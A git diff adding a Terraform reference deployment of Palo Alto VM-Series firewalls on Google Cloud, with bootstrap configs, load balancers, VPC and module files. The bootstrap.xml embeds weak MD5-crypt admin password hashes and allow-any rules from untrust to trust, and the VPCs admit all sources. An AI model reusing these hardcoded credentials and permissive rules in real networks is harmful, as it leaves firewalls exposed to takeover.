+ 10.10.2.2
+
+ spoke2-vpc
+
+
+
+ 10.10.1.2
+
+ spoke1-vpc
+
+
+
+ 10.10.1.0/24
+
+ spoke1-vpc
+
+
+
+ 10.10.2.0/24
+
+ spoke2-vpc
+
+
+
+ 10.10.1.100
+
+ spoke1-vpc
+
+
+
+
+
+
+ ethernet1/1
+ ethernet1/2
+
+
+
+
+
+ color3
+
+
+ color24
+
+
+ color20
+
+
+ color13
+
+
+
+
+
+
+
+
diff --git a/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_inbound/init-cfg.txt b/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_inbound/init-cfg.txt
new file mode 100644
index 00000000..8d3c0290
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_inbound/init-cfg.txt
@@ -0,0 +1,10 @@
+type=dhcp-client
+ip-address=
+default-gateway=
+netmask=
+ipv6-address=
+ipv6-default-gateway=
+dhcp-accept-server-hostname=yes
+dns-primary=8.8.8.8
+dns-secondary=4.2.2.2
+op-command-modes=mgmt-interface-swap
\ No newline at end of file
diff --git a/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_outbound/authcodes b/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_outbound/authcodes
new file mode 100755
index 00000000..0519ecba
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_outbound/authcodes
@@ -0,0 +1 @@
+
\ No newline at end of file
diff --git a/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_outbound/bootstrap.xml b/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_outbound/bootstrap.xml
new file mode 100644
index 00000000..90c524a9
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_outbound/bootstrap.xml
@@ -0,0 +1,706 @@
+
+
+
+
+
+ $1$eyegmtyu$VFbNwpbaZ8sUG40wpdo/A/
+
+
+ yes
+
+
+ c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFERmRyZmRqUUFSL2NnelVSRTYwLzFKbHFoWXEra3FIeGNxMlpOTTR5VkRobVZ3K2dnUXBxTWQwdG8yRmRZeXV4bUhHdVF4bGFMQkp4UDBtcW5LU3A2eUhqZ2orMTRHK29oYVpKbW5Bd3A2YXVkbXVHVkVEMnliVmZvcGc2dlh3WVdIaFdsSlk3N25ESStxQ1U1blRlMjlZNlpvU29PYmJZWkFqZjY5TXRBUzF2blEwZHduUzk2MEo4ZGdoWjMxK2Z5bTFWdDB5WFlmZ0JPYU4yK0JiK0dRa1dreEQ3UHErUEVYd3EvdysyajZ3d3ZmbEVGQVVkNXNMejh2TzBVMDBEYVZiVFVvMkFoR1VRZndlNVJsTDNTQzdzaTRQdDdYMWVsK2swTW54ZzMyUkt6UFM0ZHd6emYxRklJR2VhYVNnbVFNMGRuQ0hxYjNnMzdzWWpybWFVSGogcGdseW5u
+
+
+
+
+ yes
+
+
+ $1$xxqwnwvr$El9XN5KexgoltjkVjbkcd0
+
+
+
+
+
+
+
+
+
+
+
+
+ yes
+ 5
+
+
+ yes
+ 5
+
+
+ yes
+ 5
+
+
+ yes
+ 10
+
+
+ yes
+ 5
+
+
+
+ yes
+
+
+
+ 10
+ 10
+
+ 100
+ 50
+
+
+
+ 10
+ 10
+
+ 100
+ 50
+
+
+
+
+
+ 100
+ yes
+
+
+
+
+
+
+
+
+
+
+
+
+
+ no
+
+
+
+
+ no
+
+
+ no
+
+
+ no
+
+
+
+
+
+
+
+
+ no
+
+
+
+
+ no
+
+
+ no
+
+
+
+
+
+
+
+
+
+ no
+
+
+
+
+ health-check
+
+
+
+
+
+
+
+ 3
+ 5
+ wait-recover
+
+
+
+
+ no
+ yes
+
+
+
+
+
+
+
+
+ aes-128-cbc
+ 3des
+
+
+ sha1
+
+
+ group2
+
+
+ 8
+
+
+
+
+ aes-128-cbc
+
+
+ sha256
+
+
+ group19
+
+
+ 8
+
+
+
+
+ aes-256-cbc
+
+
+ sha384
+
+
+ group20
+
+
+ 8
+
+
+
+
+
+
+
+ aes-128-cbc
+ 3des
+
+
+ sha1
+
+
+ group2
+
+ 1
+
+
+
+
+
+ aes-128-gcm
+
+
+ none
+
+
+ group19
+
+ 1
+
+
+
+
+
+ aes-256-gcm
+
+
+ none
+
+
+ group20
+
+ 1
+
+
+
+
+
+
+ aes-128-cbc
+
+
+ sha1
+
+
+
+
+
+
+
+
+
+
+ real-time
+
+
+ high
+
+
+ high
+
+
+ medium
+
+
+ medium
+
+
+ low
+
+
+ low
+
+
+ low
+
+
+
+
+
+
+
+
+
+ no
+
+
+ 1.25
+ 0.5
+ 900
+ 300
+ 900
+ yes
+
+
+
+
+ yes
+
+
+
+
+ no
+
+
+ no
+
+
+ no
+
+
+
+ ethernet1/1
+ ethernet1/2
+ loopback.1
+
+
+
+
+
+
+
+
+
+
+
+ no
+ any
+ 2
+
+
+ 192.168.2.1
+
+
+ None
+
+ ethernet1/1
+ 10
+ 35.191.0.0/16
+
+
+
+
+
+
+ no
+ any
+ 2
+
+
+ 192.168.2.1
+
+
+ None
+
+ ethernet1/1
+ 10
+ 130.211.0.0/22
+
+
+
+
+
+
+ no
+ any
+ 2
+
+
+ 192.168.2.1
+
+
+ None
+
+ ethernet1/1
+ 10
+ 10.10.1.0/24
+
+
+
+
+
+
+ no
+ any
+ 2
+
+
+ 192.168.2.1
+
+
+ None
+
+ ethernet1/1
+ 10
+ 10.10.2.0/24
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ yes
+ no
+ yes
+ no
+
+
+ updates.paloaltonetworks.com
+
+
+
+
+ wednesday
+ 01:02
+ download-only
+
+
+
+
+ US/Pacific
+
+ yes
+ yes
+
+ PA-VM
+
+
+
+ yes
+
+
+ FQDN
+
+
+
+ yes
+ no
+ yes
+ no
+
+
+ 8.8.8.8
+ 4.2.2.2
+ mgmt-interface-swap
+
+
+
+
+
+
+
+
+
+
+
+
+ ethernet1/1
+ loopback.1
+
+
+
+
+
+
+ ethernet1/2
+
+
+
+
+
+
+
+
+
+
+
+
+ trust
+
+
+ trust
+
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ any
+
+ allow
+ universal
+ no
+
+
+
+ trust
+
+
+ trust
+
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ any
+
+ allow
+ universal
+
+
+
+ untrust
+
+
+ trust
+
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ any
+
+ allow
+
+
+
+
+
+
+ deny
+ no
+ yes
+
+
+ deny
+ no
+ yes
+
+
+
+
+
+
+
+ trust
+
+
+ trust
+
+
+
+ any
+
+ any
+ ethernet1/1
+
+ loopback-interface
+
+ No NAT on GCP LB health check.
+
+
+
+
+
+ ethernet1/2
+
+
+
+
+ untrust
+
+
+ trust
+
+
+
+ any
+
+ any
+
+
+
+
+
+
+
+ ethernet1/1
+ ethernet1/2
+ loopback.1
+
+
+
+
+
+ 35.191.0.0/16
+
+ gcp-resource
+
+
+
+ 130.211.0.0/22
+
+ gcp-resource
+
+
+
+ 100.64.0.1
+
+ gcp-resource
+
+ Loopback interface for GLB healthcheck
+
+
+
+
+
+ gcp-health-probe-1
+ gcp-health-probe-2
+
+
+ gcp-resource
+
+
+
+
+
+ color6
+
+
+ color13
+
+
+ color24
+
+
+
+
+
+
+
diff --git a/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_outbound/init-cfg.txt b/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_outbound/init-cfg.txt
new file mode 100755
index 00000000..8d3c0290
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_outbound/init-cfg.txt
@@ -0,0 +1,10 @@
+type=dhcp-client
+ip-address=
+default-gateway=
+netmask=
+ipv6-address=
+ipv6-default-gateway=
+dhcp-accept-server-hostname=yes
+dns-primary=8.8.8.8
+dns-secondary=4.2.2.2
+op-command-modes=mgmt-interface-swap
\ No newline at end of file
diff --git a/gcp/adv_peering_4fw_2spoke/diagram.png b/gcp/adv_peering_4fw_2spoke/diagram.png
new file mode 100644
index 00000000..f45262b1
Binary files /dev/null and b/gcp/adv_peering_4fw_2spoke/diagram.png differ
diff --git a/gcp/adv_peering_4fw_2spoke/fw_inbound.tf b/gcp/adv_peering_4fw_2spoke/fw_inbound.tf
new file mode 100644
index 00000000..717d691e
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/fw_inbound.tf
@@ -0,0 +1,76 @@
+#-----------------------------------------------------------------------------------------------
+# Create bootstrap bucket for inbound firewalls
+module "bootstrap_inbound" {
+ source = "./modules/gcp_bootstrap/"
+ bucket_name = "fw-bootstrap-inbound"
+ file_location = "bootstrap_files/fw_inbound/"
+ config = ["init-cfg.txt", "bootstrap.xml"]
+ license = ["authcodes"]
+}
+
+#-----------------------------------------------------------------------------------------------
+# Create inbound firewalls
+module "fw_inbound" {
+ source = "./modules/vmseries/"
+ names = var.fw_names_inbound
+ zones = [
+ data.google_compute_zones.available.names[0],
+ data.google_compute_zones.available.names[1]
+ ]
+ subnetworks = [
+ module.vpc_untrust.subnetwork_self_link[0],
+ module.vpc_mgmt.subnetwork_self_link[0],
+ module.vpc_trust.subnetwork_self_link[0]
+ ]
+ machine_type = var.fw_machine_type
+ bootstrap_bucket = module.bootstrap_inbound.bucket_name
+ mgmt_interface_swap = "enable"
+ ssh_key = fileexists(var.public_key_path) ? "admin:${file(var.public_key_path)}" : ""
+ image = "${var.fw_image}-${var.fw_panos}"
+ nic0_public_ip = true
+ nic1_public_ip = true
+ nic2_public_ip = false
+ create_instance_group = true
+
+ dependencies = [
+ module.bootstrap_inbound.completion,
+ ]
+}
+
+#-----------------------------------------------------------------------------------------------
+# Create public load balancer
+module "glb" {
+ source = "./modules/glb/"
+ name = var.glb_name
+ backends = {
+ "0" = [
+ {
+ group = module.fw_inbound.instance_group[0]
+ balancing_mode = null
+ capacity_scaler = null
+ description = null
+ max_connections = null
+ max_connections_per_instance = null
+ max_rate = null
+ max_rate_per_instance = null
+ max_utilization = null
+ },
+ {
+ group = module.fw_inbound.instance_group[1]
+ balancing_mode = null
+ capacity_scaler = null
+ description = null
+ max_connections = null
+ max_connections_per_instance = null
+ max_rate = null
+ max_rate_per_instance = null
+ max_utilization = null
+ }
+ ]
+ }
+ backend_params = [
+ // health check path, port name, port number, timeout seconds.
+ "/,http,80,10"
+ ]
+}
+
diff --git a/gcp/adv_peering_4fw_2spoke/fw_outbound.tf b/gcp/adv_peering_4fw_2spoke/fw_outbound.tf
new file mode 100644
index 00000000..b97e8281
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/fw_outbound.tf
@@ -0,0 +1,95 @@
+#-----------------------------------------------------------------------------------------------
+# Create bootstrap bucket for outbound firewalls
+module "bootstrap_outbound" {
+ source = "./modules/gcp_bootstrap/"
+ bucket_name = "fw-bootstrap-egress"
+ file_location = "bootstrap_files/fw_outbound/"
+ config = ["init-cfg.txt", "bootstrap.xml"]
+ license = ["authcodes"]
+}
+
+#-----------------------------------------------------------------------------------------------
+# Create outbound firewalls
+module "fw_outbound" {
+ source = "./modules/vmseries/"
+ names = var.fw_names_outbound
+ zones = [
+ data.google_compute_zones.available.names[0],
+ data.google_compute_zones.available.names[1]
+ ]
+ subnetworks = [
+ module.vpc_trust.subnetwork_self_link[0],
+ module.vpc_mgmt.subnetwork_self_link[0],
+ module.vpc_untrust.subnetwork_self_link[0]
+ ]
+ machine_type = var.fw_machine_type
+ bootstrap_bucket = module.bootstrap_outbound.bucket_name
+ mgmt_interface_swap = "enable"
+ ssh_key = fileexists(var.public_key_path) ? "admin:${file(var.public_key_path)}" : ""
+ image = "${var.fw_image}-${var.fw_panos}"
+ nic0_public_ip = false
+ nic1_public_ip = true
+ nic2_public_ip = true
+ create_instance_group = true
+
+ dependencies = [
+ module.bootstrap_outbound.completion,
+ ]
+}
+
+#-----------------------------------------------------------------------------------------------
+# Create 2 internal load balancers. LB-1 is A/A for internet. LB-2 is A/P for e-w.
+module "ilb" {
+ source = "./modules/ilb/"
+ name = var.ilb_name
+ subnetworks = [module.vpc_trust.subnetwork_self_link[0]]
+ all_ports = true
+ ports = []
+ health_check_port = "22"
+
+ backends = {
+ "0" = [
+ {
+ group = module.fw_outbound.instance_group[0]
+ failover = false
+ },
+ {
+ group = module.fw_outbound.instance_group[1]
+ failover = false
+ }
+ ],
+ "1" = [
+ {
+ group = module.fw_outbound.instance_group[0]
+ failover = false
+ },
+ {
+ group = module.fw_outbound.instance_group[1]
+ failover = true
+ }
+ ]
+ }
+ providers = {
+ google = google-beta
+ }
+}
+
+#-----------------------------------------------------------------------------------------------
+# Create default route to internal LB. Route will be exported to spokes via GCP peering.
+resource "google_compute_route" "default" {
+ name = "${var.ilb_name}-default"
+ provider = google-beta
+ dest_range = "0.0.0.0/0"
+ network = module.vpc_trust.vpc_self_link
+ next_hop_ilb = module.ilb.forwarding_rule[0]
+ priority = 99
+}
+
+resource "google_compute_route" "eastwest" {
+ name = "${var.ilb_name}-eastwest"
+ provider = google-beta
+ dest_range = "10.10.0.0/16"
+ network = module.vpc_trust.vpc_self_link
+ next_hop_ilb = module.ilb.forwarding_rule[1]
+ priority = 99
+}
diff --git a/gcp/adv_peering_4fw_2spoke/fw_vpc.tf b/gcp/adv_peering_4fw_2spoke/fw_vpc.tf
new file mode 100644
index 00000000..a1f096eb
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/fw_vpc.tf
@@ -0,0 +1,35 @@
+#-----------------------------------------------------------------------------------------------
+# Create firewall VPCs & subnets
+module "vpc_mgmt" {
+ source = "./modules/vpc/"
+
+ vpc = var.mgmt_vpc
+ subnets = var.mgmt_subnet
+ cidrs = var.mgmt_cidr
+ regions = [var.region]
+ allowed_sources = var.mgmt_sources
+ allowed_protocol = "TCP"
+ allowed_ports = ["443", "22"]
+}
+
+module "vpc_untrust" {
+ source = "./modules/vpc/"
+
+ vpc = var.untrust_vpc
+ subnets = var.untrust_subnet
+ cidrs = var.untrust_cidr
+ regions = [var.region]
+ allowed_sources = ["0.0.0.0/0"]
+}
+
+module "vpc_trust" {
+ source = "./modules/vpc/"
+
+ vpc = var.trust_vpc
+ subnets = var.trust_subnet
+ cidrs = var.trust_cidr
+ regions = [var.region]
+ allowed_sources = ["0.0.0.0/0"]
+ delete_default_route = true
+}
+
diff --git a/gcp/adv_peering_4fw_2spoke/guide.pdf b/gcp/adv_peering_4fw_2spoke/guide.pdf
new file mode 100644
index 00000000..8b4b69e6
Binary files /dev/null and b/gcp/adv_peering_4fw_2spoke/guide.pdf differ
diff --git a/gcp/adv_peering_4fw_2spoke/modules/gcp_bootstrap/main.tf b/gcp/adv_peering_4fw_2spoke/modules/gcp_bootstrap/main.tf
new file mode 100644
index 00000000..a93e7956
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/modules/gcp_bootstrap/main.tf
@@ -0,0 +1,85 @@
+locals {
+ bucket_name = join("", [var.bucket_name, random_string.randomstring.result])
+}
+resource "random_string" "randomstring" {
+ length = 25
+ min_lower = 15
+ min_numeric = 10
+ special = false
+}
+
+resource "google_storage_bucket" "bootstrap" {
+ name = local.bucket_name
+ force_destroy = true
+}
+
+resource "google_storage_bucket_object" "config_full" {
+ count = length(var.config) > 0 ? length(var.config) : "0"
+ name = "config/${element(var.config, count.index)}"
+ source = "${var.file_location}${element(var.config, count.index)}"
+ bucket = google_storage_bucket.bootstrap.name
+}
+
+resource "google_storage_bucket_object" "content_full" {
+ count = length(var.content) > 0 ? length(var.content) : "0"
+ name = "content/${element(var.content, count.index)}"
+ source = "${var.file_location}${element(var.content, count.index)}"
+ bucket = google_storage_bucket.bootstrap.name
+}
+
+resource "google_storage_bucket_object" "license_full" {
+ count = length(var.license) > 0 ? length(var.license) : "0"
+ name = "license/${element(var.license, count.index)}"
+ source = "${var.file_location}${element(var.license, count.index)}"
+ bucket = google_storage_bucket.bootstrap.name
+}
+
+resource "google_storage_bucket_object" "software_full" {
+ count = length(var.software) > 0 ? length(var.software) : "0"
+ name = "software/${element(var.software, count.index)}"
+ source = "${var.file_location}${element(var.software, count.index)}"
+ bucket = google_storage_bucket.bootstrap.name
+}
+
+resource "google_storage_bucket_object" "config_empty" {
+ count = length(var.config) == 0 ? 1 : 0
+ name = "config/"
+ content = "config/"
+ bucket = google_storage_bucket.bootstrap.name
+}
+
+resource "google_storage_bucket_object" "content_empty" {
+ count = length(var.content) == 0 ? 1 : 0
+ name = "content/"
+ content = "content/"
+ bucket = google_storage_bucket.bootstrap.name
+}
+
+resource "google_storage_bucket_object" "license_empty" {
+ count = length(var.license) == 0 ? 1 : 0
+ name = "license/"
+ content = "license/"
+ bucket = google_storage_bucket.bootstrap.name
+}
+
+resource "google_storage_bucket_object" "software_empty" {
+ count = length(var.software) == 0 ? 1 : 0
+ name = "software/"
+ content = "software/"
+ bucket = google_storage_bucket.bootstrap.name
+}
+
+resource "null_resource" "dependency_setter" {
+ depends_on = [
+ google_storage_bucket.bootstrap,
+ google_storage_bucket_object.config_full,
+ google_storage_bucket_object.content_full,
+ google_storage_bucket_object.license_full,
+ google_storage_bucket_object.software_full,
+ google_storage_bucket_object.config_empty,
+ google_storage_bucket_object.content_empty,
+ google_storage_bucket_object.license_empty,
+ google_storage_bucket_object.software_empty,
+ ]
+}
+
diff --git a/gcp/adv_peering_4fw_2spoke/modules/gcp_bootstrap/outputs.tf b/gcp/adv_peering_4fw_2spoke/modules/gcp_bootstrap/outputs.tf
new file mode 100644
index 00000000..3697edba
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/modules/gcp_bootstrap/outputs.tf
@@ -0,0 +1,8 @@
+output "completion" {
+ value = null_resource.dependency_setter.id
+}
+
+output "bucket_name" {
+ value = google_storage_bucket.bootstrap.name
+}
+
diff --git a/gcp/adv_peering_4fw_2spoke/modules/gcp_bootstrap/variables.tf b/gcp/adv_peering_4fw_2spoke/modules/gcp_bootstrap/variables.tf
new file mode 100644
index 00000000..ebe6f1de
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/modules/gcp_bootstrap/variables.tf
@@ -0,0 +1,24 @@
+variable "bucket_name" {
+}
+
+variable "file_location" {
+}
+
+variable "config" {
+ type = list(string)
+ default = []
+}
+
+variable "content" {
+ type = list(string)
+ default = []
+}
+
+variable "license" {
+ type = list(string)
+ default = []
+}
+
+variable "software" {
+ default = []
+}
diff --git a/gcp/adv_peering_4fw_2spoke/modules/glb/main.tf b/gcp/adv_peering_4fw_2spoke/modules/glb/main.tf
new file mode 100644
index 00000000..bbfa03d6
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/modules/glb/main.tf
@@ -0,0 +1,89 @@
+resource "google_compute_global_forwarding_rule" "http" {
+ count = var.http_forward ? 1 : 0
+ name = "${var.name}-http"
+ target = google_compute_target_http_proxy.default[0].self_link
+ ip_address = google_compute_global_address.default.address
+ port_range = "80"
+}
+
+resource "google_compute_global_forwarding_rule" "https" {
+ count = var.ssl ? 1 : 0
+ name = "${var.name}-https"
+ target = google_compute_target_https_proxy.default[0].self_link
+ ip_address = google_compute_global_address.default.address
+ port_range = "443"
+}
+
+resource "google_compute_global_address" "default" {
+ name = "${var.name}-address"
+ ip_version = var.ip_version
+}
+
+# HTTP proxy when ssl is false
+resource "google_compute_target_http_proxy" "default" {
+ count = var.http_forward ? 1 : 0
+ name = "${var.name}-http-proxy"
+ url_map = compact(
+ concat([
+ var.url_map], google_compute_url_map.default.*.self_link),
+ )[0]
+}
+# HTTPS proxy when ssl is true
+resource "google_compute_target_https_proxy" "default" {
+ count = var.ssl ? 1 : 0
+ name = "${var.name}-https-proxy"
+ url_map = compact(
+ concat([
+ var.url_map], google_compute_url_map.default.*.self_link), )[0]
+ ssl_certificates = compact(concat(var.ssl_certificates, google_compute_ssl_certificate.default.*.self_link, ), )
+}
+
+resource "google_compute_ssl_certificate" "default" {
+ count = var.ssl && ! var.use_ssl_certificates ? 1 : 0
+ name_prefix = "${var.name}-certificate"
+ private_key = var.private_key
+ certificate = var.certificate
+
+ lifecycle {
+ create_before_destroy = true
+ }
+}
+
+resource "google_compute_url_map" "default" {
+ count = var.create_url_map ? 1 : 0
+ name = "${var.name}"
+ default_service = google_compute_backend_service.default[0].self_link
+}
+
+resource "google_compute_backend_service" "default" {
+ count = length(var.backend_params)
+ name = "${var.name}-${count.index}"
+ port_name = split(",", var.backend_params[count.index])[1]
+ protocol = var.backend_protocol
+ timeout_sec = split(",", var.backend_params[count.index])[3]
+ dynamic "backend" {
+ for_each = var.backends[count.index]
+ content {
+ balancing_mode = lookup(backend.value, "balancing_mode")
+ capacity_scaler = lookup(backend.value, "capacity_scaler")
+ description = lookup(backend.value, "description")
+ group = lookup(backend.value, "group")
+ max_connections = lookup(backend.value, "max_connections")
+ max_connections_per_instance = lookup(backend.value, "max_connections_per_instance")
+ max_rate = lookup(backend.value, "max_rate")
+ max_rate_per_instance = lookup(backend.value, "max_rate_per_instance")
+ max_utilization = lookup(backend.value, "max_utilization")
+ }
+ }
+ health_checks = [
+ google_compute_http_health_check.default[count.index].self_link]
+ security_policy = var.security_policy
+ enable_cdn = var.cdn
+}
+
+resource "google_compute_http_health_check" "default" {
+ count = length(var.backend_params)
+ name = "${var.name}-check-${count.index}"
+ request_path = split(",", var.backend_params[count.index])[0]
+ port = split(",", var.backend_params[count.index])[2]
+}
diff --git a/gcp/adv_peering_4fw_2spoke/modules/glb/outputs.tf b/gcp/adv_peering_4fw_2spoke/modules/glb/outputs.tf
new file mode 100644
index 00000000..3c1a64f7
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/modules/glb/outputs.tf
@@ -0,0 +1,4 @@
+output "address" {
+ value = google_compute_global_address.default.address
+}
+
diff --git a/gcp/adv_peering_4fw_2spoke/modules/glb/variables.tf b/gcp/adv_peering_4fw_2spoke/modules/glb/variables.tf
new file mode 100644
index 00000000..742bedfb
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/modules/glb/variables.tf
@@ -0,0 +1,95 @@
+variable "ip_version" {
+ description = "IP version for the Global address (IPv4 or v6) - Empty defaults to IPV4"
+ type = string
+ default = ""
+}
+
+variable "name" {
+ description = "Name for the forwarding rule and prefix for supporting resources"
+ type = string
+}
+
+variable "backends" {
+ description = "Map backend indices to list of backend maps."
+ type = map(list(object({
+ group = string
+ balancing_mode = string
+ capacity_scaler = number
+ description = string
+ max_connections = number
+ max_connections_per_instance = number
+ max_rate = number
+ max_rate_per_instance = number
+ max_utilization = number
+ })))
+}
+
+variable "backend_params" {
+ description = "Comma-separated encoded list of parameters in order: health check path, service port name, service port, backend timeout seconds"
+ type = list(string)
+}
+
+variable "backend_protocol" {
+ description = "The protocol with which to talk to the backend service"
+ default = "HTTP"
+}
+
+variable "create_url_map" {
+ description = "Set to `false` if url_map variable is provided."
+ type = bool
+ default = true
+}
+
+variable "url_map" {
+ description = "The url_map resource to use. Default is to send all traffic to first backend."
+ type = string
+ default = ""
+}
+
+variable "http_forward" {
+ description = "Set to `false` to disable HTTP port 80 forward"
+ type = bool
+ default = true
+}
+
+variable "ssl" {
+ description = "Set to `true` to enable SSL support, requires variable `ssl_certificates` - a list of self_link certs"
+ type = bool
+ default = false
+}
+
+variable "private_key" {
+ description = "Content of the private SSL key. Required if `ssl` is `true` and `ssl_certificates` is empty."
+ type = string
+ default = ""
+}
+
+variable "certificate" {
+ description = "Content of the SSL certificate. Required if `ssl` is `true` and `ssl_certificates` is empty."
+ type = string
+ default = ""
+}
+
+variable "use_ssl_certificates" {
+ description = "If true, use the certificates provided by `ssl_certificates`, otherwise, create cert from `private_key` and `certificate`"
+ type = bool
+ default = false
+}
+
+variable "ssl_certificates" {
+ description = "SSL cert self_link list. Required if `ssl` is `true` and no `private_key` and `certificate` is provided."
+ type = list(string)
+ default = []
+}
+
+variable "security_policy" {
+ description = "The resource URL for the security policy to associate with the backend service"
+ type = string
+ default = ""
+}
+
+variable "cdn" {
+ description = "Set to `true` to enable cdn on backend."
+ type = bool
+ default = false
+}
\ No newline at end of file
diff --git a/gcp/adv_peering_4fw_2spoke/modules/ilb/main.tf b/gcp/adv_peering_4fw_2spoke/modules/ilb/main.tf
new file mode 100755
index 00000000..fee6e098
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/modules/ilb/main.tf
@@ -0,0 +1,33 @@
+resource "google_compute_health_check" "default" {
+ name = "${var.name}-check-0"
+
+ tcp_health_check {
+ port = var.health_check_port
+ }
+}
+resource "google_compute_region_backend_service" "default" {
+ count = length(var.backends)
+ name = "${var.name}-${count.index}"
+ health_checks = [google_compute_health_check.default.self_link]
+
+ dynamic "backend" {
+ for_each = var.backends[count.index]
+ content {
+ group = lookup(backend.value, "group")
+ failover = lookup(backend.value, "failover")
+ }
+ }
+ session_affinity = "NONE"
+}
+
+resource "google_compute_forwarding_rule" "default" {
+ count = length(var.backends)
+ name = "${var.name}-all-${count.index}"
+ load_balancing_scheme = "INTERNAL"
+ ip_address = var.ip_address
+ ip_protocol = var.ip_protocol
+ all_ports = var.all_ports
+ ports = var.ports
+ subnetwork = var.subnetworks[0]
+ backend_service = google_compute_region_backend_service.default[count.index].self_link
+}
diff --git a/gcp/adv_peering_4fw_2spoke/modules/ilb/outputs.tf b/gcp/adv_peering_4fw_2spoke/modules/ilb/outputs.tf
new file mode 100644
index 00000000..2e1b10ef
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/modules/ilb/outputs.tf
@@ -0,0 +1,4 @@
+output "forwarding_rule" {
+ value = google_compute_forwarding_rule.default.*.self_link
+}
+
diff --git a/gcp/adv_peering_4fw_2spoke/modules/ilb/variables.tf b/gcp/adv_peering_4fw_2spoke/modules/ilb/variables.tf
new file mode 100644
index 00000000..f6bbeb80
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/modules/ilb/variables.tf
@@ -0,0 +1,33 @@
+variable "name" {
+}
+
+variable "health_check_port" {
+ default = "22"
+}
+
+variable "backends" {
+ description = "Map backend indices to list of backend maps."
+ type = map(list(object({
+ group = string
+ failover = bool
+ })))
+}
+
+variable "subnetworks" {
+ type = list(string)
+}
+
+variable "ip_address" {
+ default = null
+}
+
+variable "ip_protocol" {
+ default = "TCP"
+}
+variable "all_ports" {
+ type = bool
+}
+variable "ports" {
+ type = list(string)
+ default = []
+}
diff --git a/gcp/adv_peering_4fw_2spoke/modules/vm/main.tf b/gcp/adv_peering_4fw_2spoke/modules/vm/main.tf
new file mode 100644
index 00000000..2f42125b
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/modules/vm/main.tf
@@ -0,0 +1,45 @@
+resource "google_compute_instance" "default" {
+ count = length(var.names)
+ name = element(var.names, count.index)
+ machine_type = var.machine_type
+ zone = element(var.zones, count.index)
+ can_ip_forward = true
+ allow_stopping_for_update = true
+ metadata_startup_script = var.startup_script
+
+ metadata = {
+ serial-port-enable = true
+ ssh-keys = var.ssh_key
+ }
+
+ network_interface {
+ subnetwork = element(var.subnetworks, count.index)
+ }
+
+ boot_disk {
+ initialize_params {
+ image = var.image
+ }
+ }
+
+ service_account {
+ scopes = var.scopes
+ }
+}
+
+
+resource "google_compute_instance_group" "default" {
+ count = var.create_instance_group ? length(var.names) : 0
+ name = "${element(var.names, count.index)}-${element(var.zones, count.index)}-ig"
+ zone = element(var.zones, count.index)
+ instances = [google_compute_instance.default[count.index].self_link]
+
+ named_port {
+ name = "http"
+ port = "80"
+ }
+
+ lifecycle {
+ create_before_destroy = true
+ }
+}
diff --git a/gcp/adv_peering_4fw_2spoke/modules/vm/outputs.tf b/gcp/adv_peering_4fw_2spoke/modules/vm/outputs.tf
new file mode 100644
index 00000000..a5c49887
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/modules/vm/outputs.tf
@@ -0,0 +1,11 @@
+output "vm_names" {
+ value = google_compute_instance.default.*.name
+}
+
+output "vm_self_link" {
+ value = google_compute_instance.default.*.self_link
+}
+
+output "instance_group" {
+ value = google_compute_instance_group.default.*.self_link
+}
diff --git a/gcp/adv_peering_4fw_2spoke/modules/vm/variables.tf b/gcp/adv_peering_4fw_2spoke/modules/vm/variables.tf
new file mode 100644
index 00000000..102808ff
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/modules/vm/variables.tf
@@ -0,0 +1,43 @@
+variable "names" {
+ type = list(string)
+}
+
+variable "machine_type" {
+}
+variable "create_instance_group" {
+ type = bool
+ default = false
+}
+
+variable "instance_group_names" {
+ type = list(string)
+ default = ["vmseries-instance-group"]
+}
+variable "zones" {
+ type = list(string)
+}
+variable "ssh_key" {
+ default = ""
+}
+variable "image" {
+}
+
+variable "subnetworks" {
+ type = list(string)
+}
+
+variable "scopes" {
+ type = list(string)
+
+ default = [
+ "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+ "https://www.googleapis.com/auth/devstorage.read_only",
+ "https://www.googleapis.com/auth/logging.write",
+ "https://www.googleapis.com/auth/monitoring.write",
+ ]
+}
+
+variable "startup_script" {
+ default = ""
+}
+
diff --git a/gcp/adv_peering_4fw_2spoke/modules/vmseries/main.tf b/gcp/adv_peering_4fw_2spoke/modules/vmseries/main.tf
new file mode 100644
index 00000000..c74ee4fa
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/modules/vmseries/main.tf
@@ -0,0 +1,83 @@
+resource "null_resource" "dependency_getter" {
+ provisioner "local-exec" {
+ command = "echo ${length(var.dependencies)}"
+ }
+}
+
+resource "google_compute_instance" "vmseries" {
+ count = length(var.names)
+ name = element(var.names, count.index)
+ machine_type = var.machine_type
+ zone = element(var.zones, count.index)
